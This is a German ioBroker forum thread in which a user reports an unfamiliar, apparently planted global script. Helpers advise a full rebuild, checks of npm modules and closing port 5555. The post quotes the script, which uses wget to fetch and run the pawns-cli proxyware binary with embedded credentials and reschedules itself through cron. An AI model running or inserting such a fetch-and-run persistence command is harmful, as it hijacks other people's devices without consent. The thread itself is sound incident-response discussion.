NEWS
[gelöst]Seltsames Script unter Global
-
@chemieka sagte in Seltsames Script unter Global:
Ja das stimmt schon,
Die DynDNS ist von dir selber oder die IP mit der 06 !?
-
@glasfaser
beides. -
Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx
denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
Werde Ihn dazu editieren !!@glasfaser
Ja bitte. System mal neu Aufsetzen. -
Hallo
Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
Wenn ich mir das anschauen, denke ich mir da ist was faul.
Der Inhalt wäre folgendes:exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); schedule("10 6 */2 * *", async function () { exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos'); });Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?
Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.
@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht. -
@glasfaser
beides.@chemieka sagte in Seltsames Script unter Global:
@glasfaser
beides.Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !?Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..
-
@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht. -
@chemieka sagte in Seltsames Script unter Global:
@glasfaser
beides.Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !?wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
nas/samba-freigabe ohne passwort?
windows ohne passwort?
raspberries mit standard login?
nas mit standard login?
etc.als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.
-
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.@chemieka sagte in Seltsames Script unter Global:
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
oder in einem der npm module nix eingebaut wurde?
dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt. -
@chemieka sagte in Seltsames Script unter Global:
@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.und du bist sicher, das sich in deinen anderen skripten nix sonstiges verbirgt?
oder in einem der npm module nix eingebaut wurde?
dann bitte alles detailliert vorher begutachten, bevor du iobroker wieder startest.
derjenige der das gemacht hat, hat detailkenntnisse von iobroker.
das ist kein automatisierter angriff, bei denen zu 99% eh alles fehlschlägt, da die systemumgebung nicht passt. -
@oliverio
Ich schaue so genau wie möglich hin. Danke bis hierhin. Gibts ja nicht was alles so möglich ist. -
@chemieka sagte in Seltsames Script unter Global:
Gibts ja nicht was alles so möglich ist.
Nur mal nebenbei , schau in deiner Fritte ... warum Port 5555 offen ist !
Und ... ändere deine DynDNS !!!!!
-
@glasfaser
Mach ich, ich hatte auch schon gescannt. Muss schauen, auf den ersten Blick mir nicht bekannt. Danke.
Support us
914
Online32.4k
Benutzer81.5k
Themen1.3m
Beiträge